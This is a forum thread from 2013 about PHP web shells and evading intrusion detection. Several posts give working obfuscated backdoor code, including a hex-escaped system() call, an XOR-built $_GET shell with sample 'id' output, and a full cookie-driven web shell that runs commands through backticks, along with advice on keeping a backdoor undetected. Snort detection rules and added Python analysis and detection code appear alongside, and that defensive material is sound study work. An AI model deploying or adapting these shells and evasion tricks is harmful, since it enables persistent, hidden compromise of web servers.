TBDSecurity Shell 0.9.1
27-10-2013, 02:02 AM, (This post was last modified: 27-10-2013, 02:18 AM by jalil.)
Post: #91
RE: TBDSecurity Shell 0.9.1
(27-10-2013, 01:44 AM)d3ck4 Wrote: 3. Avoid using PHP functions for command execution in the shell such as system(), passthru(), exec(), etc. I prefer <?php echo `[command]`; ?>, simple as that, and yet it evades the IDS.

Wsalam d3ck4,

How about using this method?

PHP Code:
<?php

// "\x73\171\x73\164\x65\155" is "system" written as hex/octal escapes and
// "\x6c\163\x20\055\x61\150" is "ls -ah". PHP resolves $jalil(...) as a
// variable function call, so this runs system("ls -ah") without either
// string appearing literally in the source.
$jalil = "\x73\171\x73\164\x65\155";
$jalil("\x6c\163\x20\055\x61\150");

?>

By the way, the most impressive method of obfuscating source code is jjencode:

http://utf-8.jp/public/jjencode.html

but it is only available for JavaScript, though.
Reply
29-10-2013, 11:08 AM,
Post: #92
RE: TBDSecurity Shell 0.9.1
(27-10-2013, 02:02 AM)jalil Wrote: By the way, the most impressive method of obfuscating source code is jjencode:

http://utf-8.jp/public/jjencode.html

but it is only available for JavaScript, though.
It's still possible in PHP.
PHP Code:
<?php
// "{" XOR "<", ">" and "/" yields "G", "E" and "T", so $_ becomes "GET"
// without that string ever appearing in the source.
$_="{";
$_=($_^"<").($_^">").($_^"/");
?>
<?php
// ${'_'.$_} is $_GET, so ?_=system&__=id calls system("id"). system()
// prints the output itself and also returns its last line, which echo
// prints again; that is why the result below appears twice.
echo ${'_'.$_}["_"](${'_'.$_}["__"]);
?>
Code:
GET /test.php?_=system&__=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reply
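Both posts above hide the name of the executing function behind string tricks. As an added example, not code from the thread, the Python below resolves both statically: it decodes the \xHH and octal escapes from post #91 to recover system("ls -ah"), and reproduces post #92's string XOR to show that '_' . ('{' ^ '<') . ('{' ^ '>') . ('{' ^ '/') is $_GET, so the request ?_=system&__=id ends up as system("id"). The EXEC_SINKS list and the function names are my own choices.

```python
import re

# Added example (not from the thread): statically resolve the two string
# tricks used in posts #91 and #92 to see which PHP function a shell calls.

# PHP double-quoted string escapes: \xHH, octal \NNN, and the usual C-style ones.
_PHP_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvef\\$"])')
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "e": "\x1b",
           "f": "\f", "\\": "\\", "$": "$", '"': '"'}

# Functions that hand a string to a shell or spawn a process (my list).
EXEC_SINKS = {"system", "passthru", "exec", "shell_exec", "popen",
              "proc_open", "pcntl_exec"}


def php_unescape(body):
    """Decode the contents of a PHP double-quoted string literal."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == "x":
            return chr(int(tok[1:], 16))
        if tok[0] in "01234567":
            return chr(int(tok, 8) & 0xFF)
        return _SIMPLE[tok]
    return _PHP_ESCAPE.sub(repl, body)


def php_xor(a, b):
    """PHP's string ^ string: bytewise XOR, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def resolve_variable_function(func_literal, arg_literal):
    """Post #91: $f = "<escaped>"; $f("<escaped>") -> (function, argument)."""
    return php_unescape(func_literal), php_unescape(arg_literal)


def resolve_superglobal(seed, keys):
    """Post #92: '_' . (seed ^ k1) . (seed ^ k2) ... names a superglobal."""
    return "_" + "".join(php_xor(seed, k) for k in keys)


def resolve_xor_shell(seed, keys, request_params):
    """Post #92: ${'_'.$_}["_"](${'_'.$_}["__"]) with the given GET params."""
    table = resolve_superglobal(seed, keys)  # e.g. "_GET"
    return table, request_params["_"], request_params["__"]


def is_exec_sink(name):
    # PHP function names are case-insensitive, so normalise before comparing.
    return name.lower() in EXEC_SINKS


if __name__ == "__main__":
    f, a = resolve_variable_function(r"\x73\171\x73\164\x65\155",
                                     r"\x6c\163\x20\055\x61\150")
    print(f"post #91 resolves to {f}({a!r}); exec sink: {is_exec_sink(f)}")
    t, f2, a2 = resolve_xor_shell("{", ["<", ">", "/"],
                                  {"_": "system", "__": "id"})
    print(f"post #92 reads ${t}: {f2}({a2!r}); exec sink: {is_exec_sink(f2)}")
```

The point of the case-insensitive check in is_exec_sink is that PHP itself resolves SYSTEM(...) and system(...) to the same function, so any analysis that compares names exactly misses the trivial variant.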
29-10-2013, 07:43 PM, (This post was last modified: 29-10-2013, 07:44 PM by mika_yazid.)
Post: #93
RE: TBDSecurity Shell 0.9.1
(27-10-2013, 01:44 AM)d3ck4 Wrote: salam..

These simple Snort rules will easily catch the PHP shell above.

# catch malicious file upload passthru() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP passthru()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"passthru("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337011; rev:9;)

# catch malicious file upload shell_exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP shell_exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"shell_exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337012; rev:9;)

# catch malicious file upload system() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP system()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"system("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337013; rev:9;)

# catch malicious file upload phpinfo() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP phpinfo()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"phpinfo("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337014; rev:9;)

# catch malicious file upload base64_decode() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP base64_decode()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"base64_decode("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337015; rev:9;)

# catch malicious file upload popen() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP popen()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"popen("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337016; rev:9;)

# catch malicious file upload exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337017; rev:9;)

# catch malicious file upload proc_open() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP proc_open()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"proc_open("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337018; rev:9;)

# catch malicious file upload pcntl_exec() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP pcntl_exec()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"pcntl_exec("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337019; rev:9;)

# catch malicious file upload python_eval() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP python_eval()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"python_eval("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337020; rev:9;)

# catch malicious file upload fopen() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP fopen()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"fopen("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337021; rev:9;)

# catch malicious file upload fclose() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP fclose()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"fclose("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337022; rev:9;)

# catch malicious file upload readfile() by Rahezar 03/07/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP readfile()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"readfile("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337023; rev:9;)

# catch malicious file upload gzinflate() by Rahezar 26/10/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP gzinflate()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"gzinflate("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337031; rev:9;)

# catch malicious file upload str_rot13() by Rahezar 26/10/2013
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"TQT Malicious File Upload Detected PHP str_rot13()"; flow:established,to_server; content:"POST"; nocase; http_method; content:"Content-Disposition"; content:"str_rot13("; reference:url,Rahezar-rnd-rulez.teb.com.my; classtype:web-application-attack; sid:1337032; rev:9;)

IDS Evasion 101

Here are my suggestions:

1. Avoid uploading the backdoor directly over a cleartext HTTP channel, unless HTTPS/SSL is enabled. But if you already have ssh, scp or sftp access, there is no point in planting a web shell at all, right?
2. Avoid using HTTP POST/GET parameters to supply the remote command; try taking the input from an HTTP header instead. Actually there is no need to encrypt the shell script with eval(), gzinflate(), base64_decode(), str_rot13() and all that. What needs to be encrypted is the traffic between the attacker's browser and the victim's web server: the supplied remote command and the returned result.

Example:

GET /shell.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Code: id; uname -a; cat /etc/issue;
Connection: keep-alive

So on the backend, shell.php renders the input taken from the HTTP header with that Code parameter.

3. Avoid using PHP functions for command execution in the shell such as system(), passthru(), exec(), etc. I prefer <?php echo `[command]`; ?>, simple as that, and yet it evades the IDS.

In conclusion, it is fine if the work is a bit more tedious, as long as the backdoor lasts long and stays undetected. A PoC of a simple PHP shell (yet 100% proven IDS/IPS evasion) will follow from me. That's all.

Put it on wiki.tbd.my please

(29-10-2013, 11:08 AM)johnburn Wrote: (quoted post #92 above)

wiki.tbd.my please
Reply
30-10-2013, 03:37 PM,
Post: #94
RE: TBDSecurity Shell 0.9.1
(29-10-2013, 07:43 PM)mika_yazid Wrote: (quoted post #93 above)

An advanced IDS/IPS would easily catch the returned result as a successful remote command execution. As promised earlier, below is my simple PoC shell illustrating my whole idea of an IDS/IPS-evading PHP shell.

Code:
<?php

        // The command arrives base64-encoded in the "param" cookie; the
        // result goes back base64-encoded inside the page's JavaScript.
        function encookie($sessid) {
                return base64_encode($sessid);
        }

        function decookie($sessid) {
                // PHP url-decodes cookie values, which turns a base64 "+"
                // into a space; put it back before decoding.
                return base64_decode(str_replace(' ', '+', $sessid));
        }

        // The backtick operator runs the command like shell_exec() would,
        // without any of the function names the rules above look for.
        function chips($more) {
                return `$more`;
        }

        // The first visit has no cookie yet; do not run an empty command.
        $param = isset($_COOKIE['param']) ? decookie($_COOKIE['param']) : '';
        $baked = ($param === '') ? '' : (string) chips($param);
        $ovenbaked = encookie($baked);

?>
<html>
<body>
<script type="text/javascript">

        function decookie(sessid) {
                return atob(sessid);
        }

        // On submit: base64 the typed command into the cookie, blank the
        // field, and let the form POST reload the page carrying the cookie.
        function encookie() {
                var x = document.forms["cookiejar"]["sessid"].value;
                var y = "param=" + btoa(x);
                document.forms["cookiejar"]["sessid"].value = "1";
                document.cookie = y;
                return true;
        }

        var chipsmore=decookie('<?php echo $ovenbaked; ?>');

        document.write("<pre>" + chipsmore + "</pre>");

</script>
<br /><br />

<form name="cookiejar" method="post" action="#" onsubmit="return encookie()">
    <input type="submit" value="#" />
    <input type="text" name="sessid" id="sessid" />
</form>
</body>
</html>

I wonder if we can use obfuscation (jjencode, etc.) on the code and combine it with our own encoding/decoding algorithm instead of the simple base64 used in the PoC code above.
Reply
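d3ck4 concedes that a capable IDS/IPS would spot the returned result. As an added example, not from the thread, the Python below makes that concrete for the PoC: base64 is encoding, not encryption, so an inspector that base64-decodes Cookie values and response bodies before matching still sees the command and the uid=...(...) output. The traffic samples are constructed in the code to mirror what the PoC form sends and what shell.php answers; the regexes and the minimum blob length are my own assumptions.

```python
import base64
import binascii
import re

# Added example, not from the thread: decode-then-inspect for the PoC's
# base64 cookie channel. Regexes, thresholds and the traffic samples are mine.

_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
# A decoded value that starts with, or chains, a common recon/download command.
_SHELL_CMD = re.compile(r"(?:^|[;|&\s])(?:id|uname|whoami|cat|ls|wget|curl|nc|bash|sh)(?:\s|;|$)")
# The shape of id(1) output that the PoC sends back inside decookie('...').
_ID_OUTPUT = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+\(")


def decode_blobs(text):
    """Yield (blob, decoded) for each strictly valid base64 run that decodes to text."""
    for m in _B64_BLOB.finditer(text):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            yield blob, decoded


def inspect_request(raw_request):
    """Findings for a request: Cookie values that base64-decode to a shell command."""
    findings = []
    for line in raw_request.split("\r\n"):
        if not line.lower().startswith("cookie:"):
            continue
        for _blob, decoded in decode_blobs(line):
            if _SHELL_CMD.search(decoded):
                findings.append(("cookie-command", decoded))
    return findings


def inspect_response(raw_response):
    """Findings for a response: any base64 blob that decodes to id(1)-style output."""
    return [("exec-result", decoded.strip())
            for _blob, decoded in decode_blobs(raw_response)
            if _ID_OUTPUT.search(decoded)]


def b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed traffic: what the PoC form sends, what shell.php answers, and a
# benign request carrying an ordinary short base64 cookie.
SAMPLE_REQUEST = ("GET /shell.php HTTP/1.1\r\nHost: www.victim.com\r\n"
                  "Cookie: PHPSESSID=abc123; param=" + b64("id; uname -a") + "\r\n\r\n")
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                   "<html><body><script>\nvar chipsmore=decookie('"
                   + b64("uid=33(www-data) gid=33(www-data) groups=33(www-data)\n")
                   + "');\ndocument.write('<pre>' + chipsmore + '</pre>');\n</script></body></html>")
BENIGN_REQUEST = ("GET /index.php HTTP/1.1\r\nHost: www.victim.com\r\n"
                  "Cookie: PHPSESSID=abc123; lang=" + b64("en-US") + "\r\n\r\n")

if __name__ == "__main__":
    print("request :", inspect_request(SAMPLE_REQUEST))
    print("response:", inspect_response(SAMPLE_RESPONSE))
    print("benign  :", inspect_request(BENIGN_REQUEST))
```

The strict decode (validate=True) plus the printable check keeps session identifiers and other random-looking tokens from producing noise, while anything the PoC actually transports decodes cleanly and is matched on its content, which is exactly what swapping base64 for a private encoding would be trying to avoid.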

